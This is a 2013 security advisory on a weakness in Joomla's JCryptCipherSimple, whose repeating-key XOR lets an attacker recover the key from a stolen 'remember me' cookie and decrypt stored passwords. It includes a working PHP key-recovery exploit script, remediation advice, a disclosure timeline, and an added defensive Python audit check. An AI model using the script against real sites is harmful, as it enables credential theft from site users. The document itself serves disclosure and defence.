Joomla Cryptography Weakness

18 Jun 2013 | Reported by Marco Beierer | Type: packetstorm | Source: packetstormsecurity.com

A cryptography weakness in Joomla's JCryptCipherSimple allows easy key calculation, leading to plaintext decryption. Exploitation requires theft of the "remember me" cookie.

Code
`# Vulnerable Application  
All current and past versions of Joomla (http://www.joomla.org) up to  
1.5.26, 2.5.11, 3.1.1. Also the Joomla platform and maybe the Joomla  
framework (not tested). At the moment there is no vendor patch available.  
  
  
# The Problem  
The problem occurs in the implementation of JCryptCipherSimple.  
JCryptCipherSimple encrypts text with a simple XOR operation in  
Electronic Codebook (ECB) mode. ECB is insecure by design and is  
normally used only for educational purposes because of its simplicity.  
  
For the encryption, the plaintext is split into small blocks and  
encrypted block by block. Each block has the same length as the key.  
The mathematical equation for the encryption is:  
Ciphertext = Plaintext XOR Key  
  
If the ciphertext and at least one block of the plaintext are known, it  
is thus very easy to calculate the key. To calculate the key, the  
equation can be rearranged as follows:  
Key = Ciphertext XOR Plaintext  
  
So, if an attacker knows the plaintext corresponding to one block of  
ciphertext, he is able to calculate the key and thus to decrypt the  
complete ciphertext.  
  
  
# An example in the Joomla core  
In the Joomla core, JCryptCipherSimple is used for the "remember  
me" function. There, the serialized user credentials are encrypted with  
JCryptCipherSimple. The serialized credentials look, for example,  
like this:  
a:2:{s:8:"username";s:12:"the_username";s:8:"password";s:12:"the_password";}  
  
The key used is 32 characters long. The first block to encrypt is thus:  
a:2:{s:8:"username";s:12:"the_us  
  
So the attacker only needs to know the beginning of the victim's  
username to calculate the key and decrypt the second and third blocks  
(including the password of the victim).  
  
  
# Exploit the core vulnerability  
To exploit the vulnerability it is necessary to steal the "remember  
me" cookie of a user. This is possible, for example, through an XSS  
vulnerability.  
  
The key can then be calculated with the script below. The script is  
written for the Joomla Platform 12.3. The functions used are identical  
to those used in the current versions of the CMS. To calculate the  
key it is necessary to set the variables $plaintext (known part of the  
credentials) and $ciphertext (content of the remember me cookie) and  
then execute the script. It may also be necessary to adjust the path  
to the required library files.  
  
  
# The exploit script  
<?php  
// Adjust these paths to the location of the Joomla Platform libraries.  
require '../libraries/import.php';  
require_once '../libraries/legacy/application/application.php';  
  
class CalculateKey extends JApplicationCli {  
    public function execute() {  
        $plaintext = ''; // first part of serialized credentials  
        $ciphertext = ''; // content of remember me cookie  
  
        // XOR is symmetric: "decrypting" the cookie with the known plaintext  
        // as the key yields Key = Ciphertext XOR Plaintext.  
        $key = new JCryptKey('simple', $plaintext, $plaintext);  
        $crypt = new JCrypt(new JCryptCipherSimple, $key);  
        $out = $crypt->decrypt($ciphertext);  
        $out = substr($out, 0, 32); // the key is 32 characters long  
  
        $this->out($out);  
    }  
}  
JApplicationCli::getInstance('CalculateKey')->execute();  
  
  
# What else?  
JCryptCipherSimple may also be used by third-party developers in  
their Joomla extensions, so there is an unknown number of vulnerable  
extensions.  
  
  
# Solution  
A solution to the problem would be to rewrite JCryptCipherSimple  
to be non-deterministic. This could be achieved by using another mode  
of operation. An alternative is to use another cipher provided by the  
Joomla core and remove JCryptCipherSimple.  
  
  
# History  
2013.05.11 Vulnerability reported to the vendor  
2013.05.12 Vendor asked for details  
2013.05.12 Details and exploit provided to the vendor  
2013.05.30 Asked vendor about the status of investigation (no response)  
2013.06.11 Sent another mail to the vendor (no response)  
2013.06.15 Full disclosure  
`
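
Added example (not part of the advisory and not Joomla's code): a Python model of the repeating-key XOR scheme described under "The Problem", with a check that an extension maintainer can run against any encrypt function for the two properties the advisory names, determinism and key recovery from one known block. The names `xor_cipher`, `randomized_standin` and `audit`, and the random key, are constructed for illustration; `randomized_standin` exists only to give the check a negative case and is not a recommended cipher.

```python
import hashlib
import os
from itertools import cycle

BLOCK = 32  # key length stated in the advisory
# Constructed sample: the advisory's example credentials and a random key.
SECRET_KEY = os.urandom(BLOCK)
COOKIE_PLAIN = (b'a:2:{s:8:"username";s:12:"the_username";'
                b's:8:"password";s:12:"the_password";}')


def xor_cipher(data: bytes, key: bytes = SECRET_KEY) -> bytes:
    """Model of the described scheme: XOR with a repeating 32-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def randomized_standin(data: bytes, key: bytes = SECRET_KEY) -> bytes:
    """Illustration only, not a recommended cipher: a fresh nonce per message
    feeds a SHA-256 counter keystream, so no key byte touches the data."""
    nonce = os.urandom(16)
    stream = b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                      for i in range(len(data) // 32 + 1))
    return nonce + bytes(d ^ s for d, s in zip(data, stream))


def audit(encrypt, probe: bytes) -> dict:
    """Flag the two properties the advisory names for an encrypt(bytes) callable."""
    c1, c2 = encrypt(probe), encrypt(probe)
    # Key = Ciphertext XOR Plaintext, taken over the first known block only.
    guess = bytes(p ^ c for p, c in zip(probe[:BLOCK], c1[:BLOCK]))
    return {
        "deterministic": c1 == c2,
        # Weak if the block-0 guess also decrypts every later block.
        "key_recoverable": xor_cipher(c1, guess)[:len(probe)] == probe,
    }


if __name__ == "__main__":
    for name, fn in (("xor_cipher", xor_cipher), ("randomized_standin", randomized_standin)):
        print(name, audit(fn, COOKIE_PLAIN))
```

The probe must be longer than one block, otherwise the first-block guess trivially "decrypts" everything and the check reports a false positive.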
